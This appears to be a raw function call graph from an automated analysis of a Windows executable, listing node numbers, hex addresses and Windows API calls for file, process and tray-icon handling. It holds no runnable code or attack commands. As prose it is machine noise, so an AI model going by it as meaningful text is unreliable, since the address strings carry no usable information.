98761 ff3f1d 59 API calls 98760->98761 98762 ff3fcc 98761->98762 98762->98763 98764 ff3fd0 CreateDirectoryW 98762->98764 98763->98489 98764->98763 98765->98456 98766->98487 98767->98487 98768->98664 98769->98662 98771 fa42e8 98770->98771 98772 fa3e53 98770->98772 98771->98772 98773 fa42ed CloseHandle 98771->98773 98774 fa42f9 98772->98774 98773->98772 98775 fe06fc 98774->98775 98776 fa4312 CreateFileW 98774->98776 98777 fa4334 98775->98777 98778 fe0702 CreateFileW 98775->98778 98776->98777 98777->98683 98778->98777 98779 fe0728 98778->98779 98790 fa410a 98779->98790 98782->98685 98784 fa38a8 98783->98784 98785 fa38b5 98783->98785 98786 fa410a 2 API calls 98784->98786 98785->98682 98787 ff394d 98785->98787 98786->98785 98800 ff384c 98787->98800 98789 ff3959 WriteFile 98789->98682 98796 fa4124 98790->98796 98791 fe06cc 98799 fa42ae SetFilePointerEx 98791->98799 98792 fa41ab SetFilePointerEx 98798 fa42ae SetFilePointerEx 98792->98798 98795 fa417f 98795->98777 98796->98791 98796->98792 98796->98795 98797 fe06e6 98798->98795 98799->98797 98801 ff385e 98800->98801 98802 ff3853 98800->98802 98801->98789 98807 fa42ae SetFilePointerEx 98802->98807 98804 ff38b8 SetFilePointerEx 98808 fa42ae SetFilePointerEx 98804->98808 98806 ff38d7 98806->98789 98807->98804 98808->98806 98809->98690 98811 fa14ce 98810->98811 98812 fa1471 98810->98812 98814 fa1981 59 API calls 98811->98814 98812->98811 98813 fa147c 98812->98813 98815 fdf1de 98813->98815 98816 fa1497 98813->98816 98819 fa149f _memmove 98814->98819 98818 fa1c7e 59 API calls 98815->98818 98827 fa1b7c 59 API calls Mailbox 98816->98827 98820 fdf1e8 98818->98820 98819->98720 98821 fb0fe6 Mailbox 59 API calls 98820->98821 98822 fdf208 98821->98822 98824 fa1aa4 59 API calls 98823->98824 98825 fa1614 98824->98825 98825->98711 98825->98727 98826->98739 98827->98819 98829 fa1692 98828->98829 98832 fa16ba _memmove 98828->98832 98830 fb0fe6 Mailbox 59 API calls 98829->98830 98829->98832 98831 fa176f _memmove 98830->98831 98833 fb0fe6 Mailbox 59 API calls 98831->98833 98832->98749 98833->98831 98834->98750 98836 ff413f 98835->98836 98837 ff4965 FindFirstFileW 98835->98837 98836->98390 98837->98836 98838 ff497a FindClose 98837->98838 98838->98836 98840 fcdd2b 98839->98840 98843 f94fa8 98839->98843 98841 fa1821 59 API calls 98840->98841 98844 fcdd3c 98840->98844 98841->98844 98842 fa19e1 59 API calls 98845 fcdd46 98842->98845 98846 fb0fe6 Mailbox 59 API calls 98843->98846 98844->98842 98849 f94fd4 98845->98849 98850 fa1207 59 API calls 98845->98850 98847 f94fbb 98846->98847 98847->98845 98848 f94fc6 98847->98848 98848->98849 98851 fa1a36 59 API calls 98848->98851 98849->98497 98849->98500 98850->98849 98851->98849 98853 fa410a 2 API calls 98852->98853 98854 fa41f7 98853->98854 98855 fa410a 2 API calls 98854->98855 98856 fa420b 98855->98856 98856->98515 98875 fa4220 98857->98875 98861 ff7c8a 98860->98861 98862 fb0fe6 Mailbox 59 API calls 98861->98862 98863 ff7c91 98862->98863 98864 ff7cbe 98863->98864 98865 ff7c9d 98863->98865 98866 fb0fe6 Mailbox 59 API calls 98864->98866 98867 fb0fe6 Mailbox 59 API calls 98865->98867 98868 ff7ca6 _memset 98866->98868 98867->98868 98868->98528 98869->98501 98870->98525 98871->98529 98872->98530 98873->98500 98874->98500 98876 fa4293 98875->98876 98879 fa422e 98875->98879 98881 fa42ae SetFilePointerEx 98876->98881 98878 fa3eb2 98878->98523 98879->98878 98880 fa4266 ReadFile 98879->98880 98880->98878 98880->98879 98881->98879 98892 ff4ce2 98882->98892 98884 ff418e Mailbox 98885 ff4195 Process32NextW 98884->98885 98886 ff4244 CloseHandle 98884->98886 98887 fa1207 59 API calls 98884->98887 98888 fa1a36 59 API calls 98884->98888 98889 fb0119 59 API calls 98884->98889 98890 fa17e0 59 API calls 98884->98890 98898 fa151f 98884->98898 98885->98884 98885->98886 98886->98538 98887->98884 98888->98884 98889->98884 98890->98884 98893 ff4d09 98892->98893 98894 ff4cf0 98892->98894 98902 fb37c3 59 API calls __wcstoi64 98893->98902 98894->98893 98897 ff4d0f 98894->98897 98901 fb385c GetStringTypeW _iswctype 98894->98901 98897->98884 98903 fa14db 98898->98903 98901->98894 98902->98897 98904 fa14e9 CompareStringW 98903->98904 98909 fdf210 98903->98909 98907 fa150c 98904->98907 98906 fdf25f 98907->98884 98908 fb4eb8 60 API calls 98908->98909 98909->98906 98909->98908 98911 f94d37 84 API calls 98910->98911 98912 100d203 98911->98912 98916 100d24a Mailbox 98912->98916 98948 100de8e 98912->98948 98914 100d617 98999 100dfb1 92 API calls Mailbox 98914->98999 98916->98541 98918 100d29b Mailbox 98918->98916 98920 f94d37 84 API calls 98918->98920 98935 100d4a2 98918->98935 98981 fffc0d 59 API calls 2 library calls 98918->98981 98982 100d6c8 61 API calls 2 library calls 98918->98982 98919 100d626 98921 100d4b0 98919->98921 98922 100d632 98919->98922 98920->98918 98961 100d057 98921->98961 98922->98916 98927 100d4e9 98976 fb0e38 98927->98976 98930 100d503 98983 ffa48d 89 API calls 4 library calls 98930->98983 98931 100d51c 98984 f947be 98931->98984 98934 100d50e GetCurrentProcess TerminateProcess 98934->98931 98935->98914 98935->98921 98939 100d68d 98939->98916 98944 100d6a1 FreeLibrary 98939->98944 98941 100d554 98996 100dd32 107 API calls _free 98941->98996 98944->98916 98947 100d565 98947->98939 98997 f94230 59 API calls Mailbox 98947->98997 98998 f9523c 59 API calls 98947->98998 99000 100dd32 107 API calls _free 98947->99000 98949 fa1aa4 59 API calls 98948->98949 98950 100dea9 CharLowerBuffW 98949->98950 99001 fef903 98950->99001 98954 fa1207 59 API calls 98955 100dee2 98954->98955 98956 fa1462 59 API calls 98955->98956 98957 100def9 98956->98957 98958 fa1981 59 API calls 98957->98958 98959 100df05 Mailbox 98958->98959 98960 100df41 Mailbox 98959->98960 99008 100d6c8 61 API calls 2 library calls 98959->99008 98960->98918 98962 100d072 98961->98962 98963 100d0c7 98961->98963 98964 fb0fe6 Mailbox 59 API calls 98962->98964 98967 100e139 98963->98967 98966 100d094 98964->98966 98965 fb0fe6 Mailbox 59 API calls 98965->98966 98966->98963 98966->98965 98968 100e362 Mailbox 98967->98968 98975 100e15c _strcat _wcscpy __NMSG_WRITE 98967->98975 98968->98927 98969 f95087 59 API calls 98969->98975 98970 f9502b 59 API calls 98970->98975 98971 f950d5 59 API calls 98971->98975 98972 f94d37 84 API calls 98972->98975 98973 fb593c 58 API calls __crtLCMapStringA_stat 98973->98975 98975->98968 98975->98969 98975->98970 98975->98971 98975->98972 98975->98973 99009 ff5e42 61 API calls 2 library calls 98975->99009 98977 fb0e4d 98976->98977 98978 fb0ee5 CreateProcessW 98977->98978 98979 fb0ed3 CloseHandle 98977->98979 98980 fb0eb3 98977->98980 98978->98980 98979->98980 98980->98930 98980->98931 98981->98918 98982->98918 98983->98934 98985 f947c6 98984->98985 98986 fb0fe6 Mailbox 59 API calls 98985->98986 98987 f947d4 98986->98987 98988 f947e0 98987->98988 99010 f946ec 59 API calls Mailbox 98987->99010 98990 f94540 98988->98990 99011 f94650 98990->99011 98992 fb0fe6 Mailbox 59 API calls 98994 f945eb 98992->98994 98993 f9454f 98993->98992 98993->98994 98994->98947 98995 f94230 59 API calls Mailbox 98994->98995 98995->98941 98996->98947 98997->98947 98998->98947 98999->98919 99000->98947 99002 fef92e __NMSG_WRITE 99001->99002 99003 fef96d 99002->99003 99005 fef963 99002->99005 99007 fefa14 99002->99007 99003->98954 99003->98959 99004 fa14db 61 API calls 99004->99005 99005->99003 99005->99004 99006 fa14db 61 API calls 99006->99007 99007->99003 99007->99006 99008->98960 99009->98975 99010->98988 99012 f94659 Mailbox 99011->99012 99013 fcd6ec 99012->99013 99018 f94663 99012->99018 99014 fb0fe6 Mailbox 59 API calls 99013->99014 99016 fcd6f8 99014->99016 99015 f9466a 99015->98993 99018->99015 99019 f95190 59 API calls Mailbox 99018->99019 99019->99018 99021 fb0fe6 Mailbox 59 API calls 99020->99021 99022 f95285 99021->99022 99023 f95294 99022->99023 99024 fa1a36 59 API calls 99022->99024 99023->98549 99024->99023 99026 fb3139 99025->99026 99027 fb31ae 99025->99027 99034 fb315e 99026->99034 99057 fb8d58 58 API calls __getptd_noexit 99026->99057 99059 fb31c0 60 API calls 3 library calls 99027->99059 99029 fb31bb 99029->98556 99031 fb3145 99058 fb8fe6 9 API calls __vswprintf_l 99031->99058 99033 fb3150 99033->98556 99034->98556 99036 fa59fe _memset 99035->99036 99060 fa5800 99036->99060 99040 fa5a83 99041 fa5ab9 Shell_NotifyIconW 99040->99041 99042 fa5a9d Shell_NotifyIconW 99040->99042 99043 fa5aab 99041->99043 99042->99043 99064 fa56f8 99043->99064 99045 fa5ab2 99045->98556 99047 fa5b25 99046->99047 99048 fa5ad5 _memset 99046->99048 99047->98556 99049 fa5af4 Shell_NotifyIconW 99048->99049 99049->99047 99051 fb0fe6 Mailbox 59 API calls 99050->99051 99052 fa1652 99051->99052 99053 fb0fe6 Mailbox 59 API calls 99052->99053 99054 fa1660 99053->99054 99054->98556 99055->98556 99056->98556 99057->99031 99058->99033 99059->99029 99061 fa581c 99060->99061 99062 fa5810 99060->99062 99061->99062 99063 fa5821 DestroyIcon 99061->99063 99062->99040 99094 ff34dd 62 API calls _W_store_winword 99062->99094 99063->99062 99065 fa5715 99064->99065 99085 fa57fa Mailbox 99064->99085 99066 fa162d 59 API calls 99065->99066 99067 fa5723 99066->99067 99068 fe0c4c LoadStringW 99067->99068 99069 fa5730 99067->99069 99072 fe0c66 99068->99072 99070 fa1821 59 API calls 99069->99070 99071 fa5745 99070->99071 99073 fa5752 99071->99073 99074 fe0c74 99071->99074 99075 fa1c9c 59 API calls 99072->99075 99073->99072 99076 fa5760 99073->99076 99080 fe0cb7 Mailbox 99074->99080 99081 fa1207 59 API calls 99074->99081 99093 fa5778 _memset _wcscpy 99074->99093 99075->99093 99077 fa1900 59 API calls 99076->99077 99078 fa576a 99077->99078 99079 fa17e0 59 API calls 99078->99079 99079->99093 99096 fb38c8 83 API calls 3 library calls 99080->99096 99083 fe0c9e 99081->99083 99082 fa57e0 Shell_NotifyIconW 99082->99085 99095 ff0252 60 API calls Mailbox 99083->99095 99085->99045 99087 fe0cd6 99090 fa1900 59 API calls 99087->99090 99088 fe0ca9 99089 fa17e0 59 API calls 99088->99089 99089->99080 99091 fe0ce7 99090->99091 99092 fa1900 59 API calls 99091->99092 99092->99093 99093->99082 99094->99040 99095->99088 99096->99087 99098 fb0fe6 Mailbox 59 API calls 99097->99098 99099 fa40e0 99098->99099 99100 fa1c7e 59 API calls 99099->99100 99101 fa40ed 99100->99101 99101->98573 99103 fa404e 99102->99103 99104 fa4085 99102->99104 99106 fb0fe6 Mailbox 59 API calls 99103->99106 99111 fa3f20 59 API calls Mailbox 99104->99111 99107 fa4055 WideCharToMultiByte 99106->99107 99110 fa3f79 59 API calls 2 library calls 99107->99110 99109 fa4077 99109->98577 99110->99109 99111->99109 99113 100a970 99112->99113 99114 100a918 99112->99114 99113->98595 99115 fb0fe6 Mailbox 59 API calls 99114->99115 99118 100a93a 99115->99118 99116 fb0fe6 Mailbox 59 API calls 99116->99118 99118->99113 99118->99116 99186 fe715b 59 API calls Mailbox 99118->99186 99120 ff78ac 99119->99120 99122 ff78e3 99119->99122 99121 fb0fe6 Mailbox 59 API calls 99120->99121 99120->99122 99121->99122 99123 fe6ebc 99122->99123 99124 fe6f06 99123->99124 99128 fe6f1c Mailbox 99123->99128 99125 fa1a36 59 API calls 99124->99125 99125->99128 99126 fe6f5a 99187 f9a820 99126->99187 99127 fe6f47 99129 100c355 298 API calls 99127->99129 99128->99126 99128->99127 99138 fe6f53 99129->99138 99132 fe7002 99132->98622 99133 fe6fdc 99133->99138 99208 ffa48d 89 API calls 4 library calls 99133->99208 99134 fe6f91 99134->99133 99136 fe6fc1 99134->99136 99134->99138 99204 fe706d 99136->99204 99209 fe6cf1 59 API calls Mailbox 99138->99209 99139->98622 99140->98605 99141->98610 99215 fa3740 99142->99215 99145 fd30b6 99311 ffa48d 89 API calls 4 library calls 99145->99311 99146 f9b07f 99146->99145 99148 fd30d4 99146->99148 99180 f9bb86 99146->99180 99181 f9b132 Mailbox _memmove 99146->99181 99312 ffa48d 89 API calls 4 library calls 99148->99312 99150 fd355e 99183 f9b4dd 99150->99183 99327 ffa48d 89 API calls 4 library calls 99150->99327 99151 fe730a 59 API calls 99151->99181 99152 fb0fe6 59 API calls Mailbox 99152->99181 99153 fd318a 99153->99183 99314 ffa48d 89 API calls 4 library calls 99153->99314 99158 fd3106 99158->99153 99313 f9a9de 298 API calls 99158->99313 99161 f953b0 298 API calls 99161->99181 99162 f93b31 59 API calls 99162->99181 99165 fd3418 99166 f953b0 298 API calls 99165->99166 99167 fd3448 99166->99167 99167->99183 99321 f939be 99167->99321 99172 f93c30 68 API calls 99172->99181 99173 fd31c3 99315 ffa48d 89 API calls 4 library calls 99173->99315 99174 fd346f 99325 ffa48d 89 API calls 4 library calls 99174->99325 99177 f9523c 59 API calls 99177->99181 99179 fa1c9c 59 API calls 99179->99181 99310 ffa48d 89 API calls 4 library calls 99180->99310 99181->99150 99181->99151 99181->99152 99181->99158 99181->99161 99181->99162 99181->99165 99181->99172 99181->99173 99181->99174 99181->99177 99181->99179 99181->99180 99181->99183 99220 f93add 99181->99220 99227 f9bc70 99181->99227 99308 f93a40 59 API calls Mailbox 99181->99308 99309 f95190 59 API calls Mailbox 99181->99309 99316 fe6c62 59 API calls 2 library calls 99181->99316 99317 100a9c3 85 API calls Mailbox 99181->99317 99318 fe6c1e 59 API calls Mailbox 99181->99318 99319 ff5ef2 68 API calls 99181->99319 99320 f93ea3 68 API calls Mailbox 99181->99320 99326 ffa12a 59 API calls 99181->99326 99183->98622 99184->98623 99185->98627 99186->99118 99188 fd2d51 99187->99188 99191 f9a84c 99187->99191 99211 ffa48d 89 API calls 4 library calls 99188->99211 99190 fd2d62 99190->99134 99192 fd2d6a 99191->99192 99199 f9a888 _memmove 99191->99199 99212 ffa48d 89 API calls 4 library calls 99192->99212 99195 fb0fe6 59 API calls Mailbox 99195->99199 99196 fd2dae 99213 f9a9de 298 API calls 99196->99213 99197 f953b0 298 API calls 99197->99199 99199->99195 99199->99196 99199->99197 99200 fd2dc8 99199->99200 99201 f9a975 99199->99201 99202 f9a962 99199->99202 99200->99201 99214 ffa48d 89 API calls 4 library calls 99200->99214 99201->99134 99202->99201 99210 100a9c3 85 API calls Mailbox 99202->99210 99205 fe7085 99204->99205 99207 100f1b2 91 API calls 99205->99207 99206 fe70d9 99206->99138 99207->99206 99208->99138 99209->99132 99210->99201 99211->99190 99212->99201 99213->99200 99214->99201 99216 fa374f 99215->99216 99219 fa376a 99215->99219 99217 fa1aa4 59 API calls 99216->99217 99218 fa3757 CharUpperBuffW 99217->99218 99218->99219 99219->99146 99221 fcd3cd 99220->99221 99222 f93aee 99220->99222 99223 fb0fe6 Mailbox 59 API calls 99222->99223 99224 f93af5 99223->99224 99225 f93b16 99224->99225 99328 f93ba5 59 API calls Mailbox 99224->99328 99225->99181 99228 fd359f 99227->99228 99239 f9bc95 99227->99239 99419 ffa48d 89 API calls 4 library calls 99228->99419 99230 f9bf3b 99230->99181 99234 f9c2b6 99234->99230 99235 f9c2c3 99234->99235 99417 f9c483 298 API calls Mailbox 99235->99417 99238 f9c2ca LockWindowUpdate DestroyWindow GetMessageW 99238->99230 99240 f9c2fc 99238->99240 99300 f9bca5 Mailbox 99239->99300 99420 f95376 60 API calls 99239->99420 99421 fe700c 298 API calls 99239->99421 99241 fd4509 TranslateMessage DispatchMessageW GetMessageW 99240->99241 99241->99241 99243 fd4539 99241->99243 99242 fd36b3 Sleep 99242->99300 99243->99230 99244 f95376 60 API calls 99244->99300 99245 fd405d WaitForSingleObject 99248 fd407d GetExitCodeProcess CloseHandle 99245->99248 99245->99300 99246 f9bf54 timeGetTime 99246->99300 99258 f9c36b 99248->99258 99249 f9c210 Sleep 99280 f9c1fa Mailbox 99249->99280 99250 fa1c9c 59 API calls 99250->99300 99251 fa1207 59 API calls 99251->99280 99252 fd43a9 Sleep 99252->99280 99253 fb0fe6 59 API calls Mailbox 99253->99300 99255 fb083e timeGetTime 99255->99280 99256 f96cd8 276 API calls 99256->99300 99258->99181 99259 f9c324 timeGetTime 99418 f95376 60 API calls 99259->99418 99260 ff4148 66 API calls 99260->99280 99262 f94d37 84 API calls 99262->99300 99263 fd4440 GetExitCodeProcess 99268 fd446c CloseHandle 99263->99268 99269 fd4456 WaitForSingleObject 99263->99269 99264 1016562 110 API calls 99264->99280 99266 f96d79 109 API calls 99266->99300 99268->99280 99269->99268 99269->99300 99270 fd38aa Sleep 99270->99300 99271 fd44c8 Sleep 99271->99300 99274 fa1a36 59 API calls 99274->99280 99279 f9c26d 99283 fa1a36 59 API calls 99279->99283 99280->99249 99280->99251 99280->99255 99280->99258 99280->99260 99280->99263 99280->99264 99280->99270 99280->99271 99280->99274 99280->99300 99428 ff2baf 60 API calls 99280->99428 99429 f95376 60 API calls 99280->99429 99430 f93ea3 68 API calls Mailbox 99280->99430 99431 f96cd8 298 API calls 99280->99431 99432 fe70e2 59 API calls 99280->99432 99433 ff57ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 99280->99433 99281 f9b020 276 API calls 99281->99300 99285 f9bf25 Mailbox 99283->99285 99284 100c355 276 API calls 99284->99300 99285->99230 99416 f9c460 10 API calls Mailbox 99285->99416 99286 ffa48d 89 API calls 99286->99300 99287 fa1a36 59 API calls 99287->99300 99289 f9a820 276 API calls 99289->99300 99290 f953b0 276 API calls 99290->99300 99291 f939be 68 API calls 99291->99300 99293 fe6cf1 59 API calls Mailbox 99293->99300 99294 fd3e13 VariantClear 99294->99300 99295 fd3ea9 VariantClear 99295->99300 99296 fd3c57 VariantClear 99296->99300 99297 f941c4 59 API calls Mailbox 99297->99300 99298 fe7aad 59 API calls 99298->99300 99299 f93ea3 68 API calls 99299->99300 99300->99242 99300->99244 99300->99245 99300->99246 99300->99249 99300->99250 99300->99252 99300->99253 99300->99256 99300->99258 99300->99259 99300->99262 99300->99266 99300->99279 99300->99280 99300->99281 99300->99284 99300->99285 99300->99286 99300->99287 99300->99289 99300->99290 99300->99291 99300->99293 99300->99294 99300->99295 99300->99296 99300->99297 99300->99298 99300->99299 99301 f95190 59 API calls Mailbox 99300->99301 99302 ff412a 3 API calls 99300->99302 99303 fa42cf CloseHandle 99300->99303 99305 100e60c 130 API calls 99300->99305 99329 f952b0 99300->99329 99338 f99a00 99300->99338 99345 f99c80 99300->99345 99376 ffbcd6 99300->99376 99406 ffe4a0 99300->99406 99409 ffc270 99300->99409 99422 1016655 59 API calls 99300->99422 99423 ffa058 59 API calls Mailbox 99300->99423 99424 fee0aa 59 API calls 99300->99424 99425 fe6c62 59 API calls 2 library calls 99300->99425 99426 f938ff 59 API calls 99300->99426 99427 f93a40 59 API calls Mailbox 99300->99427 99301->99300 99302->99300 99303->99300 99305->99300 99308->99181 99309->99181 99310->99145 99311->99183 99312->99183 99313->99153 99314->99183 99315->99183 99316->99181 99317->99181 99318->99181 99319->99181 99320->99181 99322 f939c9 99321->99322 99324 f939f0 99322->99324 99700 f93ea3 68 API calls Mailbox 99322->99700 99324->99174 99325->99183 99326->99181 99327->99183 99328->99225 99330 f952c6 99329->99330 99332 f95313 99329->99332 99331 f952d3 PeekMessageW 99330->99331 99330->99332 99331->99332 99333 f952ec 99331->99333 99332->99333 99335 fcdf68 TranslateAcceleratorW 99332->99335 99336 f9533e PeekMessageW 99332->99336 99337 f95352 TranslateMessage DispatchMessageW 99332->99337 99434 f9359e 99332->99434 99333->99300 99335->99332 99335->99336 99336->99332 99336->99333 99337->99336 99339 f99a1d 99338->99339 99340 f99a31 99338->99340 99439 f994e0 99339->99439 99473 ffa48d 89 API calls 4 library calls 99340->99473 99343 f99a28 99343->99300 99344 fd2478 99344->99344 99346 f99cb5 99345->99346 99347 fd247d 99346->99347 99350 f99d1f 99346->99350 99359 f99d79 99346->99359 99348 f953b0 298 API calls 99347->99348 99349 fd2492 99348->99349 99373 f99f50 Mailbox 99349->99373 99483 ffa48d 89 API calls 4 library calls 99349->99483 99353 fa1207 59 API calls 99350->99353 99350->99359 99351 fa1207 59 API calls 99351->99359 99355 fd24d8 99353->99355 99354 fb2f70 __cinit 67 API calls 99354->99359 99357 fb2f70 __cinit 67 API calls 99355->99357 99356 fd24fa 99356->99300 99357->99359 99358 f939be 68 API calls 99358->99373 99359->99351 99359->99354 99359->99356 99362 f99f3a 99359->99362 99359->99373 99360 f953b0 298 API calls 99360->99373 99362->99373 99484 ffa48d 89 API calls 4 library calls 99362->99484 99363 ffa48d 89 API calls 99363->99373 99367 fd27f9 99367->99300 99368 f94230 59 API calls 99368->99373 99369 f9a775 99488 ffa48d 89 API calls 4 library calls 99369->99488 99373->99358 99373->99360 99373->99363 99373->99368 99373->99369 99375 f9a058 99373->99375 99482 fa1bcc 59 API calls 2 library calls 99373->99482 99485 fe7aad 59 API calls 99373->99485 99486 100ccac 298 API calls 99373->99486 99487 100bc26 298 API calls Mailbox 99373->99487 99489 f95190 59 API calls Mailbox 99373->99489 99490 1009ab0 298 API calls Mailbox 99373->99490 99375->99300 99377 ffbcf5 99376->99377 99378 ffbdbb Mailbox 99376->99378 99379 f9502b 59 API calls 99377->99379 99380 f94d37 84 API calls 99378->99380 99404 ffbdc3 Mailbox 99378->99404 99382 ffbd00 99379->99382 99381 ffbdf3 99380->99381 99383 f94d37 84 API calls 99381->99383 99384 f9502b 59 API calls 99382->99384 99385 ffbe05 99383->99385 99386 ffbd14 99384->99386 99491 ff3ce2 99385->99491 99386->99378 99388 fa1207 59 API calls 99386->99388 99389 ffbd25 99388->99389 99390 fa1207 59 API calls 99389->99390 99391 ffbd2e 99390->99391 99392 f94d37 84 API calls 99391->99392 99393 ffbd3b 99392->99393 99394 fb0119 59 API calls 99393->99394 99395 ffbd4e 99394->99395 99396 fa17e0 59 API calls 99395->99396 99397 ffbd5f 99396->99397 99398 ff412a 3 API calls 99397->99398 99405 ffbd88 Mailbox 99397->99405 99400 ffbd6e 99398->99400 99399 f9502b 59 API calls 99399->99378 99401 fa1a36 59 API calls 99400->99401 99400->99405 99402 ffbd7f 99401->99402 99403 ff3f1d 63 API calls 99402->99403 99403->99405 99404->99300 99405->99399 99606 fff87d 99406->99606 99408 ffe4b0 99408->99300 99410 f94d37 84 API calls 99409->99410 99411 ffc286 99410->99411 99676 ff4005 99411->99676 99413 ffc28e 99414 ffc292 GetLastError 99413->99414 99415 ffc2a7 99413->99415 99414->99415 99415->99300 99416->99234 99417->99238 99418->99300 99419->99239 99420->99239 99421->99239 99422->99300 99423->99300 99424->99300 99425->99300 99426->99300 99427->99300 99428->99280 99429->99280 99430->99280 99431->99280 99432->99280 99433->99280 99435 f935e2 99434->99435 99437 f935b0 99434->99437 99435->99332 99436 f935d5 IsDialogMessageW 99436->99435 99436->99437 99437->99435 99437->99436 99438 fcd273 GetClassLongW 99437->99438 99438->99436 99438->99437 99440 f953b0 298 API calls 99439->99440 99441 f9951f 99440->99441 99442 fd2001 99441->99442 99456 f99527 _memmove 99441->99456 99475 f95190 59 API calls Mailbox 99442->99475 99444 fd22c0 99481 ffa48d 89 API calls 4 library calls 99444->99481 99446 fd22de 99446->99446 99447 f99583 99447->99343 99448 f99944 99451 fb0fe6 Mailbox 59 API calls 99448->99451 99449 f9986a 99452 f9987f 99449->99452 99453 fd22b1 99449->99453 99450 fb0fe6 59 API calls Mailbox 99450->99456 99465 f996e3 _memmove 99451->99465 99455 fb0fe6 Mailbox 59 API calls 99452->99455 99480 100a983 59 API calls 99453->99480 99460 f9977d 99455->99460 99456->99444 99456->99447 99456->99448 99456->99450 99457 f996cf 99456->99457 99471 f99741 99456->99471 99457->99448 99459 f996dc 99457->99459 99458 fb0fe6 Mailbox 59 API calls 99463 f9970e 99458->99463 99462 fb0fe6 Mailbox 59 API calls 99459->99462 99460->99343 99461 fd22a0 99479 ffa48d 89 API calls 4 library calls 99461->99479 99462->99465 99463->99471 99474 f9cca0 298 API calls 99463->99474 99465->99458 99465->99463 99465->99471 99468 fd2278 99478 ffa48d 89 API calls 4 library calls 99468->99478 99470 fd2253 99477 ffa48d 89 API calls 4 library calls 99470->99477 99471->99449 99471->99460 99471->99461 99471->99468 99471->99470 99476 f98180 298 API calls 99471->99476 99473->99344 99474->99471 99475->99448 99476->99471 99477->99460 99478->99460 99479->99460 99480->99444 99481->99446 99482->99373 99483->99373 99484->99373 99485->99373 99486->99373 99487->99373 99488->99367 99489->99373 99490->99373 99492 fa1207 59 API calls 99491->99492 99493 ff3cff 99492->99493 99494 fa1207 59 API calls 99493->99494 99495 ff3d07 99494->99495 99496 fa1207 59 API calls 99495->99496 99497 ff3d0f 99496->99497 99498 fa1207 59 API calls 99497->99498 99499 ff3d17 99498->99499 99500 fb0284 60 API calls 99499->99500 99501 ff3d21 99500->99501 99502 fb0284 60 API calls 99501->99502 99503 ff3d2b 99502->99503 99537 ff4f82 99503->99537 99505 ff3d36 99548 ff4fec GetFileAttributesW 99505->99548 99508 ff3d53 99509 ff4fec GetFileAttributesW 99508->99509 99511 ff3d5b 99509->99511 99510 fa1900 59 API calls 99510->99508 99512 ff3d68 99511->99512 99513 fa1900 59 API calls 99511->99513 99514 fa1207 59 API calls 99512->99514 99513->99512 99515 ff3d70 99514->99515 99516 fa1207 59 API calls 99515->99516 99517 ff3d78 99516->99517 99518 fb0119 59 API calls 99517->99518 99519 ff3d89 FindFirstFileW 99518->99519 99520 ff3eb4 FindClose 99519->99520 99535 ff3dac Mailbox 99519->99535 99526 ff3ebe Mailbox 99520->99526 99521 ff3e88 FindNextFileW 99521->99535 99522 fa1a36 59 API calls 99522->99535 99524 fa1c9c 59 API calls 99524->99535 99525 fa17e0 59 API calls 99525->99535 99526->99404 99527 fa1900 59 API calls 99527->99535 99528 ff412a 3 API calls 99528->99535 99529 ff3eab FindClose 99529->99526 99530 ff3e2a 99531 fa151f 61 API calls 99530->99531 99532 ff3e4e MoveFileW 99530->99532 99534 ff3e3e DeleteFileW 99530->99534 99531->99530 99532->99535 99533 ff3ef7 CopyFileExW 99533->99535 99534->99535 99535->99520 99535->99521 99535->99522 99535->99524 99535->99525 99535->99527 99535->99528 99535->99529 99535->99530 99535->99533 99536 ff3e6b DeleteFileW 99535->99536 99550 ff4561 99535->99550 99536->99535 99538 fa1207 59 API calls 99537->99538 99539 ff4f97 99538->99539 99540 fa1207 59 API calls 99539->99540 99541 ff4f9f 99540->99541 99542 fb0119 59 API calls 99541->99542 99543 ff4fae 99542->99543 99544 fb0119 59 API calls 99543->99544 99545 ff4fbe 99544->99545 99546 fa151f 61 API calls 99545->99546 99547 ff4fce Mailbox 99546->99547 99547->99505 99549 ff3d41 99548->99549 99549->99508 99549->99510 99551 ff457d 99550->99551 99552 ff4582 99551->99552 99553 ff4590 99551->99553 99554 fa1c9c 59 API calls 99552->99554 99555 fa1207 59 API calls 99553->99555 99556 ff458b Mailbox 99554->99556 99557 ff4598 99555->99557 99556->99535 99558 fa1207 59 API calls 99557->99558 99559 ff45a0 99558->99559 99560 fa1207 59 API calls 99559->99560 99561 ff45ab 99560->99561 99562 fa1207 59 API calls 99561->99562 99563 ff45b3 99562->99563 99564 fa1207 59 API calls 99563->99564 99565 ff45bb 99564->99565 99566 fa1207 59 API calls 99565->99566 99567 ff45c3 99566->99567 99568 fa1207 59 API calls 99567->99568 99569 ff45cb 99568->99569 99570 fa1207 59 API calls 99569->99570 99571 ff45d3 99570->99571 99572 fb0119 59 API calls 99571->99572 99573 ff45ea 99572->99573 99574 fb0119 59 API calls 99573->99574 99575 ff4603 99574->99575 99576 fa1609 59 API calls 99575->99576 99577 ff460f 99576->99577 99578 ff4622 99577->99578 99579 fa1981 59 API calls 99577->99579 99580 fa1609 59 API calls 99578->99580 99579->99578 99581 ff462b 99580->99581 99582 ff463b 99581->99582 99583 fa1981 59 API calls 99581->99583 99584 fa1c9c 59 API calls 99582->99584 99583->99582 99585 ff4647 99584->99585 99586 fa17e0 59 API calls 99585->99586 99587 ff4653 99586->99587 99604 ff4713 59 API calls 99587->99604 99589 ff4662 99605 ff4713 59 API calls 99589->99605 99591 ff4675 99592 fa1609 59 API calls 99591->99592 99593 ff467f 99592->99593 99594 ff4696 99593->99594 99595 ff4684 99593->99595 99596 fa1609 59 API calls 99594->99596 99597 fa1900 59 API calls 99595->99597 99598 ff469f 99596->99598 99599 ff4691 99597->99599 99600 ff46bd 99598->99600 99601 fa1900 59 API calls 99598->99601 99602 fa17e0 59 API calls 99599->99602 99603 fa17e0 59 API calls 99600->99603 99601->99599 99602->99600 99603->99556 99604->99589 99605->99591 99607 fff898 99606->99607 99608 fff8f2 99606->99608 99610 fb0fe6 Mailbox 59 API calls 99607->99610 99668 fffbb7 59 API calls 99608->99668 99611 fff89f 99610->99611 99612 fff8ab 99611->99612 99666 fa3df7 60 API calls Mailbox 99611->99666 99614 f94d37 84 API calls 99612->99614 99619 fff8bd 99614->99619 99615 fff9cb 99662 ff8cd0 99615->99662 99616 fff8ff 99616->99615 99617 fff8d9 99616->99617 99623 fff93f 99616->99623 99617->99408 99621 fa3e47 67 API calls 99619->99621 99620 fff9d2 99626 ff394d 3 API calls 99620->99626 99622 fff8c9 99621->99622 99622->99616 99624 fff8cd 99622->99624 99625 f94d37 84 API calls 99623->99625 99624->99617 99667 fa3f0b CloseHandle 99624->99667 99632 fff946 99625->99632 